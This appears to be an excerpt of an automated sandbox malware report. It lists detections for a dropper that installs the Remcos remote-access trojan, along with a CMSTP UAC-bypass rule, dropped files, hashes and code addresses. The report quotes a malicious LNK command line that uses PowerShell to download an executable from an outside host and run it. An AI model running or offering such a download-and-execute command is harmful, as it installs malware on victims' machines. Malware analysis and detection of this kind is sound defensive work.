Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\hello.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: MdkbG2pK4l.lnk

LNK file: /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile %APPDATA%/hello.exe && %APPDATA%/hello.exe

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB0D95 NtdllDefWindowProc_W,	19_2_6FEB0D95
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB2932 _memset,NtdllDefWindowProc_W,	19_2_6FEB2932
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEAE5F6 NtdllDefWindowProc_W,CallWindowProcW,	19_2_6FEAE5F6

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\lnfast_x64.job

Jump to behavior

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00404FAA	11_2_00404FAA
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0041206B	11_2_0041206B
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0041022D	11_2_0041022D
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00411F91	11_2_00411F91
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25E70	12_2_6FE25E70
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE263F0	12_2_6FE263F0
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE35FB7	12_2_6FE35FB7
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3AE45	12_2_6FE3AE45
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE43E3B	12_2_6FE43E3B
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE31D85	12_2_6FE31D85
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25CA0	12_2_6FE25CA0
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE42CBB	12_2_6FE42CBB
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE36C6C	12_2_6FE36C6C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE36860	12_2_6FE36860
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE4586C	12_2_6FE4586C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE217D0	12_2_6FE217D0
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE43743	12_2_6FE43743
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE21730	12_2_6FE21730
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE21739	12_2_6FE21739
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3648C	12_2_6FE3648C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE431FF	12_2_6FE431FF
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3708C	12_2_6FE3708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C915E70	13_2_6C915E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9163F0	13_2_6C9163F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92648C	13_2_6C92648C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C932CBB	13_2_6C932CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C915CA0	13_2_6C915CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C926C6C	13_2_6C926C6C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C921D85	13_2_6C921D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C933E3B	13_2_6C933E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92AE45	13_2_6C92AE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C925FB7	13_2_6C925FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9117D0	13_2_6C9117D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C911731	13_2_6C911731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C911730	13_2_6C911730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C933743	13_2_6C933743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92708C	13_2_6C92708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C926860	13_2_6C926860
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C93586C	13_2_6C93586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9331FF	13_2_6C9331FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5E70	19_2_6FEA5E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA63F0	19_2_6FEA63F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB5FB7	19_2_6FEB5FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEBAE45	19_2_6FEBAE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC3E3B	19_2_6FEC3E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB1D85	19_2_6FEB1D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5CA0	19_2_6FEA5CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC2CBB	19_2_6FEC2CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB6C6C	19_2_6FEB6C6C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC586C	19_2_6FEC586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB6860	19_2_6FEB6860
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA17D0	19_2_6FEA17D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC3743	19_2_6FEC3743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA1730	19_2_6FEA1730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA1731	19_2_6FEA1731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB648C	19_2_6FEB648C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC31FF	19_2_6FEC31FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB708C	19_2_6FEB708C

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\lejp 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\paogviura 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6C9250C9 appears 65 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6FEB53BC appears 49 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6C9253BC appears 45 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6FEB50C9 appears 65 times
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: String function: 0040243B appears 37 times
Source: C:\Users\user\DZIPR.exe	Code function: String function: 6FE350C9 appears 66 times
Source: C:\Users\user\DZIPR.exe	Code function: String function: 6FE353BC appears 48 times

Source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
